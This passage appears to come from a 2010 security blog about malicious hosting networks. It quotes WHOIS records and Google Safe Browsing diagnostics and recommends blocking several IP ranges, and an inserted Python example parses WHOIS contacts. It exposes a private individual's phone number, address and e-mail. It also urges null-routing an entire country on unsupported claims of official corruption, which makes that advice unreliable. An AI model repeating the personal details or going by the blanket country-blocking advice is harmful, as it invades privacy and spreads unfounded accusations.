mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          MNT-DONSTROY
mnt-routes:      MNT-DONSTROY
mnt-domains:     MNT-DONSTROY
source:          RIPE # Filtered

organisation:    ORG-DL107-RIPE
org-name:        Donstroy Ltd.
org-type:        OTHER
address:         Kalinina 19, 6, Bendery, Moldova
e-mail:          sagade95@gmail.com
mnt-ref:         MNT-DONSTROY
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

person:          Juris Sahurovs
address:         Rezekne Darzu iela 21
phone:           +37120034981
nic-hdl:         JS1050
e-mail:          sagade95@gmail.com
source:          RIPE # Filtered

% Information related to '194.8.250.0/23AS29557'

route:           194.8.250.0/23
descr:           donstroy-route-1
origin:          AS29557
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered
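
The pivot described above (a contact e-mail that ties the Donstroy records to Sagade) can be automated when many WHOIS records need reviewing. This is an added example, not part of the original post: it parses an abridged copy of the RIPE objects quoted above, converts the inetnum range to CIDR, and lists identifiers shared between objects. The function names and `PIVOT_KEYS` are this example's own.

```python
import ipaddress
import re

# Sample input abridged from the RIPE objects quoted above, embedded to run offline.
WHOIS_TEXT = """\
inetnum:      194.8.250.0 - 194.8.251.255
admin-c:      JS1050

organisation: ORG-DL107-RIPE
e-mail:       sagade95@gmail.com
mnt-by:       MNT-DONSTROY

person:       Juris Sahurovs
nic-hdl:      JS1050
e-mail:       sagade95@gmail.com

route:        194.8.250.0/23
mnt-by:       MNT-DONSTROY
"""
PIVOT_KEYS = {"e-mail", "admin-c", "tech-c", "nic-hdl", "mnt-by", "org"}

def parse_rpsl(text):
    """Split WHOIS output into objects: lists of (attribute, value) pairs."""
    objects = []
    for block in re.split(r"\n\s*\n", text.strip()):
        pairs = [line.partition(":") for line in block.splitlines()
                 if ":" in line and not line.startswith("%")]
        if pairs:
            objects.append([(k.strip().lower(), v.strip()) for k, _, v in pairs])
    return objects

def covering_cidrs(inetnum_value):
    """Turn 'first - last' into the minimal list of CIDR blocks to filter on."""
    first, last = (ipaddress.ip_address(p.strip()) for p in inetnum_value.split("-"))
    return [str(n) for n in ipaddress.summarize_address_range(first, last)]

def shared_identifiers(objects):
    """Map each contact or maintainer value to the objects using it (2+ only)."""
    seen = {}
    for obj in objects:
        name = ":".join(obj[0])            # first attribute names the object
        for key, value in obj:
            if key in PIVOT_KEYS:
                seen.setdefault(value.lower(), set()).add(name)
    return {v: sorted(o) for v, o in seen.items() if len(o) > 1}

def mentions(objects, keyword):
    """Attribute values containing a name already known from another network."""
    return sorted({(k, v) for obj in objects for k, v in obj if keyword.lower() in v.lower()})
```

Calling `mentions(parse_rpsl(WHOIS_TEXT), "sagade")` surfaces the e-mail attribute, and `covering_cidrs` confirms that the inetnum range and the route object describe the same /23.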

Google's Safe Browsing diagnostics are not good:

Safe Browsing
Diagnostic page for AS29557 (ASNOVIFORUM)

What happened when Google visited sites hosted on this network?

    Of the 42 site(s) we tested on this network over the past 90 days, 2 site(s), including, for example, fastprosearch.com/, twilightsex.cz.cc/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-10-10, and the last time suspicious content was found was on 2010-10-10.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, manoso.cz.cc/, noaos1.cz.cc/, sunporno.cz.cc/, that appeared to function as intermediaries for the infection of 31 other site(s) including, for example, business-standard.com/, ddl-blog.org/, onlyteensx.net/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s), including, for example, 194.8.251.0/, prostodomen.in/, globalvalidator.cz.cc/, that infected 215 other site(s), including, for example, business-standard.com/, renisyqaqir.freehostking.com/, hetivilesum.freehostking.com/.

A search against MyWOT reputations reveals a concentration of very bad sites (report here). The best thing to do is to block all traffic to 194.8.250.0 - 194.8.251.255 (194.8.250.0/23) and/or the domains listed below:


Wednesday 25 August 2010

Evil network: Sagade Ltd / ATECH-SAGADE AS6851 (85.234.190.0/23)

I've mentioned Sagade Ltd before; it's a totally Black Hat Latvian network that should be blocked on sight. Google's Safe Browsing diagnostic for this range is fairly damning:

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, 85.234.190.0 appeared to function as an intermediary for the infection of 476 site(s) including lekarnar.com/, mysofa.es/, audiofile.org.ua/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 1999 domain(s), including audiofile.org.ua/, votailprof.it/, capinaremos.com/.

There's very little point playing whack-a-mole with these Latvian IP addresses. It's probably worth null-routing the entire country until some government agency that isn't being paid off by Russian organised criminals sorts the mess out. There's a list of major Latvian IP address allocations here. Unless you do business in the Baltic states, blocking all of them will probably do no harm.

Domains in the IP address range 85.234.190.0 - 85.234.191.255 are:

Evil network: Latnet Serviss Ltd (latnet.lv) AS2588 (159.148.117.0/24)

Latvia is definitely becoming a problem when it comes to black hat hosting. The 159.148.117.0/24 range (159.148.117.0 - 159.148.117.255) is another malicious block, forming part of AS2588 belonging to Latnet (similar to microlines.lv). By a rough calculation, about half the IP address ranges I am currently blocking are based in Latvia.

This bunch of domains is a mix of fake pharma sites, browser exploits, illegal downloads and possibly some hijacked domains. In any case, there is nothing of use here, and blocking either the entire IP range or the list below is probably a good idea.

There's a more detailed file with MyWOT ratings and IP addresses to download here.


UPDATE 2014-06-25:  It's been a long time since I wrote this, and it looks like the block was cleaned up some time ago and now contains some Latvian government sites.